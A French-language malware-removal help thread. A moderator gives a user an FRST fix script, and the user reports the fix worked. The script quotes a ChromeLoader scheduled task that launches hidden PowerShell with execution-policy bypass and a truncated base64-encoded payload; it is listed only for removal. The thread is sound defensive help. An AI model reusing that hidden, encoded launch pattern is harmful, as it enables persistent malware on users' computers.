Sujet Précédent Sujet Suivant

Powershell provoquant retours windows

Fermé
biscuitmer - Modifié le 3 févr. 2022 à 00:13
MisteryBean Messages postés 8829 Date d'inscription jeudi 19 décembre 2019 Statut Modérateur, Contributeur sécurité Dernière intervention 31 mars 2025 - 3 févr. 2022 à 11:04
Bonjour,
j'ai regardé le tuto afin d'obtenir les liens nécessaire avec FRST, je vous remercie pour cela. J'aimerais quelqu'un qui puisse m'aider pour la suite afin de pouvoir régler ces problèmes.

Voici les liens :
Addition : https://www.cjoint.com/c/LBcpzBDLIam
FRST : https://www.cjoint.com/c/LBcpzVfwMWm

Configuration: Windows / Edge 97.0.1072.76
A voir également:

4 réponses

Réponse 1 / 4
MisteryBean Messages postés 8829 Date d'inscription jeudi 19 décembre 2019 Statut Modérateur, Contributeur sécurité Dernière intervention 31 mars 2025 1 250
2 févr. 2022 à 18:55
Bonjour,

--> Copie ce qui se trouve ci dessous de start:: à end:: (sans le coller nulle part)

--> Ouvres FRST(ou FRST64) en administrateur et cliques sur Corriger
Si FRST semble se bloquer ou ne répond pas , laisse tourner

--> Un fichier fixlog est créé au même endroit que FRST , postes le

--> Dis moi si tu as toujours le problème . 

start::
closeprocesses:
createrestorepoint:
CustomCLSID: HKU\S-1-5-21-3419220990-238505790-198961922-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\enzo3\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll => Pas de fichier
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log:F107EE40EF [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer1.log_backup1:2DD1EC5C91 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer10.log_backup1:AD433BF298 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer11.log_backup1:97A90964FA [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log:C40F6B9209 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer12.log_backup1:7CC29836A6 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer13.log:AE3C879266 [10]
AlternateDataStreams: C:\ProgramData\DisplaySessionContainer14.log_backup1:D61270D3FD [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk:4E42ED6D31 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zotero.lnk:3FAA705B12 [10]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [3638]
Task: {72F974CB-7EDC-48EC-BBC9-D00F9FA484DD} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXvGPUDisableTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe Disable (Pas de fichier)
Task: {81E97724-97EC-49BA-91D8-2F68F74B6AFA} - System32\Tasks\Microsoft\Windows\termsrv\RemoteFX\RemoteFXWarningTask => C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe Warning (Pas de fichier)
Task: {93C1356C-CE98-44C8-AA35-ED55C004FBF2} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKAAoAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAHgAdABQAGEAdABoACkAKQB7AAoACgAJACQAYQByAGMAa (l'élément de données a 1471 caractères en plus). <==== ATTENTION
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
C:\Users\enzo3\AppData\Local\Chrome
cmd: sfc /scannow
emptytemp:
end::
0
Réponse 2 / 4
biscuitmer
3 févr. 2022 à 10:12
Je te transmets le lien suivant pour le fichier Fixlog : https://www.cjoint.com/c/LBdjlgGu2Ja

Merci pour ta réponse rapide !
0
Réponse 3 / 4
MisteryBean Messages postés 8829 Date d'inscription jeudi 19 décembre 2019 Statut Modérateur, Contributeur sécurité Dernière intervention 31 mars 2025 1 250
3 févr. 2022 à 10:44
RE_

OK pour le fixlog . Comment se comporte le PC ?
0
biscuitmer
3 févr. 2022 à 11:02
ca m'a l'air fixe, merci bien en tout cas!
0
Réponse 4 / 4
MisteryBean Messages postés 8829 Date d'inscription jeudi 19 décembre 2019 Statut Modérateur, Contributeur sécurité Dernière intervention 31 mars 2025 1 250
3 févr. 2022 à 11:04
RE_

Pour supprimer automatiquement tous les fichiers/dossiers créés par FRST et l'outil lui-même, renomme FRST/FRST64.exe en uninstall.exe et exécute-le.

La procédure nécessite un redémarrage

Bonne continuation
0